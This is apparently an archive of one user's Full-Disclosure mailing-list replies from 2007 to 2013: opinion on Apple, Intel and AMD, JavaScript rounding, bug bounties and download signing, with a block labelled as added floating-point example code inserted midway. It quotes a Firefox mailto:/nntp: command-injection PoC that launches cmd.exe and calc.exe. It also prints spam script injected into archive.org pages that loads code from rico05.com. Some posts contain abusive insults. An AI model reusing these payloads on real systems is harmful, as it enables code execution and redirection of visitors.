[Full-disclosure] Introducing libOnionRoute, the library to anonymize software

2013-05-06 Thread wac
Hi Everyone:

LibOnionRoute, the library to anonymize software, was just released. It
is basically a modification of Tor to transform it into a library you
can link to your software. Some of us believe it is more secure in some
situations to use it like that.

To find out more please visit:

http://onionroute.org

Regards
Waldo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] iPhone Geolocation storage

2011-05-11 Thread wac
So many ppl waste so much time in dead-end technology. Amazing. I once
purchased a Mac and that's because it was old and extremely cheap.
Didn't even use it. Nothing worked there. It hung, and the hard drive
always got wrong bits in the bitmap after the hang. I wasted my money.
Apple users are nothing but low-end inferior animals to Apple Inc. I
feel sorry for them. Honestly. Overpriced hardware tied to their
software, infected with bugs to the bones, with abusive rules about
the software they can run. And then they have to crack the very own
hardware they paid so much money for. Poor animals. Now we know they
are being tracked like cattle. And of course the decrepit argument
that because software is digitally signed it won't let anything
malicious run there. Hmmm, that's a lie to an ignorant luser. Didn't the very
own Ionescu load a non-signed driver with a broken ATI driver and
get his ass in Hollywood for doing that to Windows? Hey, the
PlayStation got those proxy discs to load pirated discs years before.
Are all applications in the App Store bug free? :D Why don't they just
say that they want to control the software market and apply
monopolistic rules/rates? Too strong? Folks, just ignore them. They
are a zero already. It's not even worth jailbreaking their bullshit.
That's exactly the game Apple Inc. wants you to play. Use you like a
rabbit so hackers break the platform and software developers take the
bait. Same goes for users. They will think they have their amazing
free piece of crap and then get an iBrick, software developers banned
and hackers' effort thrown in the trash can with an update that takes
them seconds. And of course the press blah blah blah. Boring.

On 5/4/11, Jeffrey Walton noloa...@gmail.com wrote:
 iOS 4.3.3 is now available. From the two iPhone forensics
 books I have, trimming the location database (consolidated.db) is like
 sticking your thumb in a hole in a New Orleans levee. It ain't gonna
 help much.

 Jeff




Re: [Full-disclosure] sourceforge entry point seems still active.

2011-01-30 Thread wac
So it actually happened! Not surprising at all. I suspected a phishing
attempt at first sight because of the email address in another domain
they gave for contact in case of problems with the password reset
(didn't bother about headers anyway).

Seems mine was not compromised, according to what they say: "Our
analysis uncovered (among other things) a hacked SSH daemon, which was
modified to do password capture."

If I were them I would reinstall from scratch at least all SSH
servers. They all could be compromised!

On 1/30/11, exploit dev extraexpl...@gmail.com wrote:
 Sourceforge has reported a full report of attack. Seems very close to what I
 wrote in previous messages and reported in my blog posts related to this
 thread.

 Sourceforge Attack: Full Report
 http://sourceforge.net/blog/sourceforge-attack-full-report/

 On Tue, Jan 25, 2011 at 9:18 PM, exploit dev extraexpl...@gmail.com wrote:

 Hi Andrew,

 just a reminder: this breach was used by php/python/perl scripts to get
 and save a bot and remote shell in the user directory. Also you could, as
 reported also in the owned and exposed zine, launch commands and attempt
 privilege escalation. So I'm not so sure that this is not so writable as
 well; I think it is not right to say that it is not critical.

 Regards-.


 On Tue, Jan 25, 2011 at 8:47 PM, Andrew Farmer andf...@gmail.com wrote:

 On 2011-01-24, at 12:08, exploit dev wrote:
  Anyway, I'm sorry repeat my message. I think that this issue is a bit
  critical but I don't receive still any feedback,

 It's not particularly critical by any means. SourceForge projects all
 have
 their own web space, and there are doubtless a bunch of them running
 vulnerable versions of software. These sites are relatively isolated, and
 don't have write access to the project's SCM or downloads.




 --
 http://extraexploit.blogspot.com




 --
 http://extraexploit.blogspot.com




Re: [Full-disclosure] Making Security Suck Less

2010-12-23 Thread wac
Aha, welcome to the world. It is broken and will likely stay that way
for long. So do what I do... Adapt, take a seat, wear a green hat if
you can and forget about the rest. They will not understand, nor do they
want to. Besides, we would see a load of net admins losing their jobs
/ companies filing for bankruptcy if the model changes so...

You know what.. Bertrand Russell said once:

"Men who are unhappy, like men who sleep badly, are always proud of the fact."

Sort of like the old way of saying don't worry, be happy! :D

And I have serious doubts about that OSSTMM btw.



On 12/16/10, Pete Herzog li...@isecom.org wrote:
 Hi,

 Now not everything about the old security model is bad. Personally, I
 really like the Zen feel of it. It's like raking the fine, white,
 beach sand into those concentric lines and around rocks and dead fish
 and stuff. It's very Zen. Then as the tide rises, the wind blows, and
 Frisbees get badly thrown you have to do it all over again in a very
 Zen way like this: Install. Harden. Configure. Patch. Scan. Patch
 again. Update. Re-configure. Scan. Patch again. Uninstall. Re-install.
 Configure. And then you do it all over again! With so much Zen
 practice it's hard not to become a Master of the security repeat
 cycle. But you know what else is Zen? NOT doing that. It's less
 stressful to maintain an existing balance between operations,
 limitations, and controls than running around and putting out fires.

 This is from my new article called, Making Security Suck Less you
 can read finished at:

 https://www.infosecisland.com/blogview/10304-Making-Security-Suck-Less.html

 There's some more, new articles reviewing the OSSTMM and the new
 security model at InfoSec Island here:

 https://www.infosecisland.com/osstmm.html

 Sincerely,
 -pete.

 --
 Pete Herzog - Managing Director - p...@isecom.org
 ISECOM - Institute for Security and Open Methodologies
 www.isecom.org - www.osstmm.org
 www.hackerhighschool.org - www.badpeopleproject.org





Re: [Full-disclosure] NSOADV-2010-002: Google Wave Design Bugs

2010-02-03 Thread wac
In any case I wonder how much Google is going to respect corporate or industry
secrets or all that stuff you don't want them to know with Google Wave. The best
thing to do is not to use it. I really doubt that it is an improvement and
I think I will hardly ever need it. It's just more fanboi food. (Knowing Gmail
as I know it, and having left it for public stuff only, as I did.)

On Thu, Jan 21, 2010 at 5:28 AM, dramacrat yirim...@gmail.com wrote:

 inb4 front page news

 2010/1/21 bugt...@cgisecurity.net

  Well, that's exactly what I'm saying.  Pretending that this is some kind of
  new exploit class simply because Google Wave is used is stupid.  This is the
  logical extension of e-mail and instant message and social network
  attacks to the next potential platform.

 Following in the history of the security community, we should coin a
 buzzword on this old issue with a new spin.
 WaveJacking sounds like a perfect fit.
 /sarcasm


  On Tue, Jan 19, 2010 at 8:10 PM, valdis.kletni...@vt.edu wrote:
 
   On Tue, 19 Jan 2010 19:01:36 CST, Rohit Patnaik said:
Yeah, no kidding.  Surprise! Untrusted files can be malicious.  If
 you
 accept files from those whom you do not trust, whether it's via
 e-mail,
instant message, Google Wave, or physical media, you well and truly
   deserve
the virus that'll eventually infect your machine.
  
   Let's see.. *HOW* many years ago did we first see e-mail based viruses
 that
   depended on people opening them because they came from people they
 already
   knew?  'CHRISTMA EXEC' in 1984 comes to mind.
  
   The problem here is that Google Wave is for *collaboration* - which
 means
   that you're communicating with people you already know, and presumably
   trust to some degree or other. Hey Joe, look at this PDF and tell me
   what you think is something reasonable when the request comes from
   somebody
   who Joe knows and who has sent Joe PDF's in the past.
  
   I guarantee that if every time you receive a document that appears to
 be
   from
   your boss, you call back and ask if they really intended to send a
 document
   or
   if it's a virus, your boss will get very cranky with you very fast.
  
   Let's look at that original advisory again:
  
An attacker could upload his malware to a wave and share it to his
Google Wave contacts.
  
   Now change that to An attacker could trick/pwn some poor victim into
   uploading
   the malware to a wave  Hilarity ensues.
  
  
  
  
 

Re: [Full-disclosure] Google Maps XSS (currently unpatched)

2010-02-03 Thread wac
 First of all, security is a myth. One can presume they're secure
(or secluded) from danger sitting behind a firewall, but to do so is
just foolish.

Something is better than nothing ;).

 People in power love to say "if you have nothing to hide then you have nothing to
worry about" when it comes to tracking, keeping data, searching data etc
etc, 1984 et al... but this is wrong. I'm not doing anything wrong in my
eyes, but that may mean toppling the overbearing government that
wants us all chipped, so my privacy is worth a lot. Once it's too late,
it will be very difficult to get privacy back.

Yet worse than being chipped is that somebody is looking forward to harming
you, even if they don't know you and even if you don't know them either. Never
forget about that.

Re: [Full-disclosure] What the UK government care about in a hacker

2008-06-26 Thread wac
How will the UK government contact you? Brute guys will jump out of a
Range Rover or Land Rover with darkened windows and give
you an offer you can't refuse after abducting you for five minutes
based on your research post on Full-Disclosure.

Guys? Nope.

Re: [Full-disclosure] Tool release: extract Windows credentials from registry hives

2008-02-22 Thread wac
Two Things Infinite: The Universe and Human Stupidity
Albert Einstein

Google
Error


Forbidden
Your client does not have permission to get URL
/files/creddump-0.1.tar.bz2 from this server. (Client IP address:
xxx.xxx.xxx.xxx)

You are accessing this page from a forbidden country.


Why Google Code? Don't waste your time or others' that want to download;
use SourceForge, Codeplex, FSF, etc. and make them lose revenue.
It's so laughable, since the license permits redistribution in the
first place and mirroring it won't be a crime. And then proxies /
bouncers / tunnels. But then why make you or your visitors lose time?
Or... maybe Google wants us to make mirrors without limitations of
its entire website and make us get the revenue they won't ;). Let us
know, Google, we are impatient to clone your SF takeover attempt sh...
without restrictions.


On 2/20/08, Brendan Dolan-Gavitt [EMAIL PROTECTED] wrote:
 CredDump is a new tool implemented entirely in Python that is capable
 of extracting:

 * LM and NT hashes (SYSKEY protected)
 * Cached domain passwords
 * LSA secrets

 It has no dependencies on any part of Windows, and operates directly
 on registry hive files. It is licensed under the GPL and intended to
 be easy to read, so you can find out how various Windows obfuscation
 algorithms work by reading the code. (I will also be posting a series
 of articles explaining the algorithms in detail on my blog in the
 coming weeks).

 You can download the tool at:
 http://code.google.com/p/creddump/

 Or read a more detailed introduction at:
 http://moyix.blogspot.com/2008/02/creddump-extract-credentials-from.html

 CredDump is based on the hard work of many people, so please read
 the credits section in the README.

 Cheers,
 Brendan





Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug

2007-10-01 Thread wac
Hello:

On 9/29/07, Andrew Farmer [EMAIL PROTECTED]  wrote:


 If your bank is doing financial calculations using Javascript in a
 standard web browser, you have bigger things to worry about than
 roundoff errors.


 Ok, let's explain this with more details because I realize that you got
something else (and it might be the case for others). I was not referring to
banks performing all of the calculations in the browser. That would be
insane because users would be manipulating that for sure by changing a couple
of web pages. A bank would not last a single day on the internet in such a
case. I was commenting to you about some calculations done in your browser so
you don't have to make them in your head, your operating system calculator or
a pocket calculator. Taxes and other kinds of financial calculations for
example. Hey, I could add a financial calculator on one side of a page so you
don't have to pick one. I don't know which calculations you could do; I'm not
a banker (not yet. I'll tell you by then). The browser can do that kind of
thing better than you. I don't know an exact example but it could be the
case. Remember there are a zillion websites out there. All the bank needs to
be sure of is that all of the movements you do do not exceed your balance. If
you (or your browser), intentionally or not, perform the calculation
wrong... Well... that is your problem. You won't steal money from the bank
with that. And that kind of thing is very likely to be put into the browser
more and more with AJAX, Silverlight and all of them, just to prevent mistakes
in the first place. It's the trend. So a rounding bug in JavaScript (in such
a case) could be really serious.

 Also notice that if there is really a problem in the FF JavaScript engine it
goes beyond the browser. You could run Tamarin, SpiderMonkey or Rhino on the
server side and perform some processing there with JavaScript.

http://developer.mozilla.org/en/docs/About_JavaScript

Another common application for JavaScript is as a (web) server side
scripting language. A JavaScript web server would expose host objects
representing a HTTP request and response objects, which could then be
manipulated by a JavaScript program to dynamically generate web pages.


I based my previous comments on comments from some other persons but not on
my own tests. I tried this code and it is giving me the same result (
5.1005) in IE 6, FF 2.0.0.7 and Opera 9.23:

<html>
<script type="text/javascript">
a=5.2;
b=0.1;
alert(a-b);
</script>
</html>

This one is giving me the same numbers too in every browser:

<html>
<a href="javascript:alert(5.2-0.1)">arrf</a>
</html>


 So it seems to me that IE is actually performing those
calculations with higher precision only when used as a calculator (directly
in the address box) but not in JavaScript code
(fortunately). However, let me know if you find something. I'm interested and
would like to be aware of it.

 As a side comment I wanted to tell you that what is out
there on the internet is not a standard. It is what IE dictates. IE rules the
internet whether you like it or not. It comes from a big one and also comes
preinstalled. That's why it holds a big share of the market. It dominates
and puts a lot of pressure on the content published on the
internet. As IE adapts to the web, the web also adapts to IE.

As another side comment about the FP math. Well, don't worry, I already did
that some time ago. While I'm not an expert in numeric math, that was the
first part of the first course of numeric math in my second year. As a
curiosity, and also a very usual mistake, in FP math a + b + c is not always
equal to a + c + b. You must sort the numbers before doing that and do the
calculation from lower to higher if you want the most accurate results. Yes,
FP math is tricky sometimes and a lot of care must be taken with it since it
is not real math but approximations. For example, sometimes you need to make
transformations to equations or use Taylor series. It might look boring at
first sight but when you look closer you realize that it is very important
and catches your eye.

Regards
Waldo Alvarez

Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug

2007-10-01 Thread wac

 If I use strcpy() to read user input into a buffer, I am at fault and
 not the C compiler.


 I don't think that's a fair comparison.
If you implement the right algorithm and you do not get the expected
results, it *is* not your fault but that of whatever you are sitting on
(compiler, framework, library ...).

Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug

2007-09-29 Thread wac
Hello:

On 9/28/07, Jimby Sharp [EMAIL PROTECTED] wrote:

 How is this serious and is it related to security in any manner? If
 not, please do not spam. :-(


 Many bugs are security related (I would say all). How is it security
related? Think. What happens if your bank calculates something wrong and
puts the lower amount in your account and the higher in another account? Yes,
it might be little, but what about a little many times? That could be done
with JavaScript too. Then... you are not safe anymore. Especially today with
the invasion of AJAX. One of the browsers is broken for sure (several?). They
should do the same even in such small things. It should at least be very
carefully documented. However, just documenting it is only going to bring
trouble since many programmers won't be aware of that. They would not even be
making mistakes in the code but triggering somebody else's errors. This kind
of stuff happens many times. For instance, a couple of days ago I hit a
problem in which both Opera and Firefox behaved differently from IE (some
parameters in the form were not sent to the server). It was with a
<table><form>...</form></table> instead of <form><table>...</table></form>
(or the other way around, I can't remember which was the workaround).

 Yes, every bug is security related. A database that is out of sync. An
improperly rounded number. Remember why Ariane blew up in the air because
of this? Remember the Mars rover that locked up because of a priority
inversion bug? Would you call it a security bug? I really doubt many of you
would. However, millions were lost. Wasn't it security related? Think. What
if someday the computers that handle the nuclear plant nearby make a wrong
rounding and one of the parameters goes out of range? Computers handle that,
handle your car, all of your communications, your heartbeat and even your
footsteps (heard about those smart Adidas with a chip?).

 What if an airplane computer misses one of the parameters? It *is* a security
bug even if it is not a stack/heap overflow, an integer overflow or all of
the rest you all know about. I consider if not all of the bugs, at least the
vast majority, as security bugs. For your very own good, start thinking that
way too. Because someday you could even die just because somebody else
made a mistake in one of those control systems. Worse yet... because someone
thought that it wasn't a security bug and was not important to fix.

Regards
Waldo Alvarez

PS: Now you have another way to verify (fingerprint) which browser is used to
browse a website even with spoofed User-Agent headers if JavaScript is
turned on.

And go and learn some floating point maths.

 On 9/28/07, carl hardwick [EMAIL PROTECTED] wrote:
  There's a flaw in Firefox 2.0.0.7 that allows javascript to execute wrong
  subtractions.
 
  PoC concept here:
  javascript:5.2-0.1
  (copy this code into address bar)
 
  Firefox 2.0.0.7 result: 5.1005 (WRONG!)
  Internet Explorer 7 result: 5.1 (OK)
 
 


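Worked example for the floating-point points raised in this post and in the 2007-10-01 reply above: the 5.2-0.1 result, why the order of additions matters, the "sort before summing" advice, and the integer-cents approach that keeps money out of doubles altogether. This is added code, not from the original posts or from any browser vendor; it runs under Node.js and the inputs are constructed for the demonstration.

```javascript
// Added example: IEEE-754 doubles, the only number type in every JavaScript
// engine, behave identically in IE, Firefox and Opera. The "bug" is the
// number format, not the engine. All sample inputs below are constructed.

// The subtraction from the thread; gives 5.1000000000000005 everywhere,
// because neither 5.2 nor 0.1 is exactly representable in binary.
function subtractAsDouble(a, b) {
  return a - b;
}

// Floating-point addition is not associative: rounding happens after each
// operation, so the order of the same operands changes the result.
function sumLeftToRight(xs) {
  return xs.reduce((acc, x) => acc + x, 0);
}

// The sorting advice from the thread: add the small terms first so they
// are not swallowed one by one when added to a large partial sum.
function sumAscending(xs) {
  const sorted = [...xs].sort((p, q) => Math.abs(p) - Math.abs(q));
  return sumLeftToRight(sorted);
}

// Kahan compensated summation: carries the rounding error of each step
// into the next one, which recovers the same digits without sorting.
function sumKahan(xs) {
  let sum = 0;
  let comp = 0;
  for (const x of xs) {
    const y = x - comp;
    const t = sum + y;
    comp = (t - sum) - y;
    sum = t;
  }
  return sum;
}

// Money must never be a double. Hold amounts as integer cents and convert
// only at the edges; every integer up to 2^53 is exact in a double.
function parseCents(text) {
  const m = /^(-?)(\d+)(?:\.(\d{1,2}))?$/.exec(text.trim());
  if (!m) throw new RangeError(`not a money amount: ${text}`);
  const [, sign, whole, frac = ''] = m;
  const cents = Number(whole) * 100 + Number(frac.padEnd(2, '0'));
  return sign === '-' ? -cents : cents;
}

function formatCents(cents) {
  const sign = cents < 0 ? '-' : '';
  const abs = Math.abs(cents);
  return `${sign}${Math.floor(abs / 100)}.${String(abs % 100).padStart(2, '0')}`;
}

function subtractMoney(a, b) {
  return formatCents(parseCents(a) - parseCents(b));
}

function demo() {
  console.log('5.2 - 0.1 as doubles :', subtractAsDouble(5.2, 0.1));
  console.log('(1e20 + 1) - 1e20    :', sumLeftToRight([1e20, 1, -1e20]));
  console.log('1e20 - 1e20 + 1      :', sumLeftToRight([1e20, -1e20, 1]));
  const xs = [1e16, 1, 1, 1, 1]; // 1e16 sits where doubles are spaced 2 apart
  console.log('left to right        :', sumLeftToRight(xs));
  console.log('ascending magnitude  :', sumAscending(xs));
  console.log('Kahan                :', sumKahan(xs));
  console.log('5.20 - 0.10 in cents :', subtractMoney('5.20', '0.10'));
}

demo();
```

The four 1s are lost one at a time when added to 1e16 left to right (each 1e16+1 rounds back to 1e16), while summing in ascending magnitude or with Kahan compensation yields 10000000000000004; the cents functions show the representation a banking page should use instead of arithmetic on doubles.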

[Full-disclosure] www.archive.org --- XSS (and under attack)

2007-09-25 Thread wac
Hello:

It could take me a while to investigate this more but I have no
time ATM (veeery busy) and the website is under attack. (It should be a
matter of trying that script on some form. Get a virtual pass for the library,
dig into the book publishing forms and report back.)

Try these links:
http://www.archive.org/details/BuyPhentermineOnline_979
http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery


Parts of the HTML follow to help spot the hole

...

<a href="/search.php?query=subject:%22 free delivery%22"> free
delivery</a></p></div><p xmlns:fo="http://www.w3.org/1999/XSL/Format"
class="content" style="text-align:left;"><script language="javascript" src="
http://rico05.com/counter/counter.js?id=950&key=buy+phentermine"></script>

...



/- counter.js (called directly) -/

var ref = escape(document.referrer);
document.write('<script language="javascript" src="http://rico05.com/counter/counter.js?ref=' + ref + '"></script>');

 /- EOF -/



/- counter.js (with referer forged) -/

document.location = 'http://rico05.com/search/?said=951&q=buy phentermine';

/- EOF -/


And that's it. A lot of money spamming users.
Who is said=951? Ask rico05.com; if they are not a bunch of phishers they
should tell you.

Regards
Waldo Alvarez

Re: [Full-disclosure] Remote hole in OpenBSD 4.1

2007-08-06 Thread wac
Hello:

 Maybe if their microcode were open or at least not encrypted (was it DES?) we
could disassemble it and see for ourselves. Right now it doesn't matter if
you can read the source code of your entire operating system + drivers +
apps or even your ROM. In the end they've got you whatever you run there,
Linux, Windows, BSD, whatever, just pick (ohh yes, you only need to send
special data over the net and you could be running code even in ring -1 if
you have control of the microcode). I wish I could have an electron
microscope. Yes, call me paranoid but these days you have to. Probably all of
their CPUs from Intel, AMD and many others have had several flaws buried inside
them for years. Maybe exploitable by someone who by chance found one. That
is not a surprise given the fact that we all have seen several flaws in the
past, to the point that they decided that the microcode should be updated.
Great feature btw; they realized too late about that.

 Any company considering making a Neutral CPU? Think about that: emulation
at full speed of several architectures, PPC, SPARC, x86, x64 (maybe even
at the same time), reduced costs (the extra cost being microcode
development) and no copy-you-are-mine infringement since that would be code
from somebody else. Many of us would be happy to pay for our freedom and by
the way throw away dynamic translators. That will sell like water. Think
about that. The next revolution ;) Yep, maybe talking I'm losing this
vision. Ok, one out of the basket.

 And yes, Intel has made a lot of sh.. in the past in order to harm other
competitors. They ended up hurting users in the end. Remember the time you
could buy Intel, AMD or Cyrix without changing your motherboard? Ahh, now the
motherfuckers made you buy one or the other with their copycrap in the
sockets. I probably would have AMD by now (in my opinion they have proven to
offer better stuff in the long run, maybe not high clocks but certainly
higher performance or lower costs or better per-watt performance or great
features). Now there is VT and Pacifica, several versions of 3DNow and SSE.
And thanks to M$ (yes, thanks a lot) we got compatible 64 bits. Otherwise
they would be doing the same sh. Jaj, maybe they end up copyrighting your
opcodes. In the end lots of millions are lost for their fucking battle
making things inoperative with each other. Programmers breaking their heads
because we have to work and learn double, triple ... ad infinitum. Users
complain because X soft is only compatible with 3DNow/SSE or whatever
thing and then almost nobody uses that (MMX at most). There should be laws
that would prevent them from doing that kind of thing that hurts everyone
(including them) in the long run and makes the life of millions of persons
problematic just because they want to hold a share. That is not development.
Period.

 And about the deRaadt thing being paid by AMD. Yes, well maybe you are right,
maybe not. But then remember the BP "I watch too much Matrix Trilogy" crap
just before Intel releasing their shiny hardware. That is a bad taste joke.
AMD is in fact safer than VT if combined with the proper hardware. Maybe in
practice it is not implemented by vendors (that is where the real problem
would be) but then that is probably a first step to later move the Trusted
Platform completely inside the CPU. Now who started the "I pay a tech
bitch (sorry, but that's what they are if they actually are paid for telling
us lies) on the flaws side" war? Ding ding, INTEL... Again?!?!

I'm not an x86 CPU historian but this is what I have seen so far (not in
chronological order) and it stinks

AMD makes 3Dnow   Intel makes incompatible SSE

AMD starts to grab too many users on the low end market --- Intel makes the
socket copyrighted (of course AMD answers with the same)

AMD 3DNow 2 --- Intel SSE2 SSE3 SSE4

AMD makes 64 bits --- Intel tries to make incompatible 64 bits and M$ says
that there won't be a Windows for that and Intel gives up. I would have
preferred to give a final kick to CISC so actually I didn't like the AMD
version, but hey, at least we have compatible things.

AMD makes designs for up to 8 cores --- Intel simply had to RUN
(fortunately they could not do anything else)

AMD makes Pacifica (Secure Virtual Machine) --- Intel makes a low end
version they called VT that only has a turn me off bit (fortunately
something can be done about this) or... where is the SKINIT equivalent?

 Intel pays a tech bitch to distract buyers from buying insecure AMD chips
--- AMD pays a tech bitch to distract buyers from buying faulty/insecure
Intel chips. At least that's what it looks like on both sides. Of course, who
can prove that? Any of those "they are paying" claims could be true or not;
there is no real evidence. Fortunately we can verify both fault claims. For
the first one by reading the docs, and for the other claims by trying some POC
with a CPU that is not updated. However, M$ released almost silent updates
for the microcode driver; that's some evidence that suggests that 

Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability

2007-07-27 Thread wac
 today when we download files from the
internet. But worse is what they tell you to do. Download only from safe
places (what is a safe place? a safe website?). Keep your antivirus up to
date etc etc. Yeahh, your antivirus up to date. Until it is face to face with
a modified version of Morphine or whatever protector around covering your
favorite worm.

In summary, something like this

http://releases.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5/source/firefox-2.0.0.5-source.tar.bz2.asc


but for binaries not only sources. And the public key visible by everyone
over SSL. Today you first have to hunt for the key and the signature is only
provided for the source packages.

ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5/KEY.


FTP = Anybody can modify that in transit.

Then you can read there:

Please realize that this file itself or the public key servers may be

compromised.  You are encouraged to validate the authenticity of these keys in
an out-of-band manner.

...

Mozilla developers: please ensure that your key is also available via the
PGP keyservers (such as pgpkeys.mit.edu).


Then after digging in pgpkeys.mit.edu you can finally find it here


http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x0E3606D9


All of that comes in clear text even if you try to use SSL for pgp.mit.edu.
Where is the security? Nowhere. The security of the world fits in a cup of
coffee. Period.

Now you could ask yourself: Sure, but why Firefox? That applies to all sorts
of binaries around. Yes, unfortunately it does. But then browsers are
sensitive software. But then FF is pretty popular (and growing) and should
serve as an example to others. It is open source so no problem about sharing it
at all since it was made to be shared. That's why. Why not X company? Remember
they are too superior to even listen so I won't waste my time with them.
However I know some of them are already reading this and I hope that at
least they start to consider that.

it's not like we are passing you an executable... if you are concerned
 that it will be modified in transit, you could always visit
 httpS://xs-sniper.com.


Don't worry, I have absolutely no intention to visit your website that takes
advantage of someone else's findings for your own advertising profit. I can
find better information about that in Bugzilla. And next time save your S.
You are typing extra.

I'd think SSL would provide more than
 reasonable security around that concern.

 If you need more, you could send me your private PGP key and I could
 send the exploit to you directly. :)


Sure, I can send you one of my *private* keys + public revocation certificate
(or an expired private key). But then why waste my time? Maybe if I send you
a public one you can try to play with Shor (I recommend you first try to
understand emails or get a brain before you try that). Remember that you
need to buy a computer with 8195 qubits to run the period finding routine.
You can't do that with your Pentium X. Try your local dealer!!

Pissed off? Yes I know that last part really stinks. With that I'm paying
you back with the very same coin so you can see how it looks from the other side.
The point? Don't do to others what you don't like to get back. Try that
option next time!! Take it as a lesson. And grow, buddy, you are still in the
"I'm l33t and better than everyone" part, the part where you honestly look
like a... (a word that you won't properly interpret). No offense this time.

Have a nice day
Waldo

Thanks,

 Nate

 On 7/25/07, wac  [EMAIL PROTECTED] wrote:
  Well I hope the next version won't open 45 Internet Explorers when I
  click the mailto URLs. And that when you download something you don't have
  the save button enabled by default (and with that delay to avoid return hits,
  security things). It should have the cancel button enabled by default,
  instead of everybody having to wait a century to get the save button
  activated. It is so broken that way. Ahh, and to prevent clicks, the dialog
  displayed somewhere away from the mouse pointer. Ahh, and by default not
  having the "open with" enabled when you download but the "save as" (somebody
  can hit enter without noticing). Hey, maybe configurable?
 
  And what about providing on the website some hash over SSL so you can
  verify that it was not modified on the fly when you download? I mean encrypting
  every download around is simply brain dead but a hash is OK. Hey, what
  about a digital signature you could verify with a public key? Zero overload on
  servers ;)
 
  Regards
  Waldo Alvarez.
 
  On 7/25/07, Mesut EREN  [EMAIL PROTECTED] wrote:
  
  
  
  
   Hi all,
  
   FF 2.0.0.5 new remote code Execution vulnerability, I tested FF
  2.0.0.5. But the code doesn't work.
  
   Example code is
  
   mailto:%00%00../../../../../../windows/system32/cmd.exe
  ../../../../../../../../windows/system32/calc.exe  - 
  blah.bat
  
   nntp:%00%00../../../../../../windows/system32/cmd.exe
  ../../../../../../../../windows/system32/calc.exe

Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability

2007-07-25 Thread wac

Well I hope the next version won't open 45 Internet Explorers when I click
the mailto URLs. And that when you download something you don't have the
save button enabled by default (and with that delay to avoid return hits,
security things). It should have the cancel button enabled by default,
instead of everybody having to wait a century to get the save button
activated. It is so broken that way. Ahh, and to prevent clicks, the dialog
displayed somewhere away from the mouse pointer. Ahh, and by default not
having the "open with" enabled when you download but the "save as" (somebody can
hit enter without noticing). Hey, maybe configurable?

And what about providing on the website some hash over SSL so you can verify
that it was not modified on the fly when you download? I mean encrypting
every download around is simply brain dead but a hash is OK. Hey, what about
a digital signature you could verify with a public key? Zero overload on
servers ;)

Regards
Waldo Alvarez.

On 7/25/07, Mesut EREN [EMAIL PROTECTED] wrote:


 Hi all,

FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5.
But the code doesn't work.

Example code is

mailto:%00%00../../../../../../windows/system32/cmd%00%00../../../../../../windows/system32/cmd.exe
../../../../../../../../windows/system32/calc.exe  -  blah.bat

nntp:%00%00../../../../../../windows/system32/cmd.exe
../../../../../../../../windows/system32/calc.exe  -  blah.bat

What am I missing?

Mesut EREN
BAŞAK ÇATI  CEPHE SİSTEMLERİ
IT Officer

MCSA:S,MCSE:S,CEH,CCNA

[EMAIL PROTECTED]



Re: [Full-disclosure] EXPLOITS FOR SALE (AUCTION SITE)

2007-07-10 Thread wac

On 7/8/07, jt5944-27a [EMAIL PROTECTED] wrote:

thank you? okay - thank you for creating this wonderful software

that we use. thank you for listening to our defect requests and
thank you for addressing them in a meaningful time frame. but thank
you for finding bugs? are you on drugs?



Drugs? What are you talking about? That is completely off-topic. A hit that
bounces back to yourself.

they didn't ask you to look for defects. this sounds like those

people who paint house numbers on your curb and then want to be
paid even though you never said to paint the numbers. or those
windshield washers who want you to pay them for smearing your
window when you didn't ask for it. the only people who should be
paid to find vulnerabilities are the people asked to find
vulnerabilities.



What about those who come right into your face without even trying to find
them? Hey, we know how software works. We are all using it and we can think.
And sometimes we can track them down too. Don't forget that.

And what about those bugs that are created on purpose? A trojanized
software or device is too obvious (remember NSA-Crypto AG). But a security
bug? Well sorry, we made a mistake, we are providing a fix. However it can
serve the same purpose as a trojan horse. They simply can know earlier and
fix it later if something goes out of control. That could explain why
fixes take so much time sometimes and why there are so many bugs. (Just a
theory with some basis).

No, ppl searching for vulnerabilities should not be only the ones asked to
do it. It should be every third party around. And guess what. It is being done
right now for whatever purpose. Wouldn't it be better if they are sold in the
public light than in the shadows? At least we know what is flawed, otherwise
not even a clue. You are right now only looking at the tip of the iceberg.
After looking at that website and seeing Yahoo Messenger 8.1 being on
sale I am considering not using it for a while, or putting it under a protection
layer, or using alternatives. Why? Somebody else could have found that too and
could be using it. And if somebody asks my opinion about installing some soft
listed there I would tell them not to do it because it is not safe. That
means security after all. And if they make money, then good. Somebody that
knows how to find them was rewarded and encouraged to do more research.
Something you forgot to do before distributing to ppl. Yep, cutting the
bill puts ppl under risk. That reminds me of cars that exploded because of
bad design and ppl becoming ill with cancer or something else by feeding
chickens with hormones and stuff like that. On the other side I am pretty
sure that those grey foreigners you all talk about already have their own
working teams and already have undisclosed technology. The one you don't
know. You better favor research so you can put the finger on the hole before
water begins to flow.

But using your very own "who asked you", I could reply to you as well. Who
asked you to make a software/service/device? Yet more, who asked you to make
something that is broken? But yet more, who asked you to make something that
is broken and that you sell/provide as if it is good? But then I don't want
to reply to you that way because I understand that things need to be done
even if nobody asks for them. That also applies to security research. Hey,
many times people don't ask because they simply ignore things.

And about the windshield washers. Well, you could understand that they are
usually ppl with an extreme need for some cash (otherwise they wouldn't be
doing that), many times just to eat while you drive your fancy car. You could
be more human than that. If I were in that situation and I had some cash
and some of them smeared my windshield I would not be poorer/richer for giving
them something. That would make me a lot better than you.

After all they are working, not robbing/assaulting ppl on the streets or
hitting your neck to steal your wallet. Or do you prefer that? They have the
right to live too and you are pushing them to find desperate alternatives.
That's what is wrong. And since you are simply taking the example to compare
it with security research, then take it back to the original example, compare
and see for yourself.

should we pay burglars for breaking into our homes?


No, we could pay key makers that know when your lock can be broken so a
burglar doesn't break into your home. That's quite different. You will be
paying for your own security. Hey, burglars are already paying for that and
you are only complaining. Doing that is not going to change anything. Don't
you think it is better to try new or better alternatives? Even if that means
that you will make a little less money or that it will cost you a little
extra?

and what about

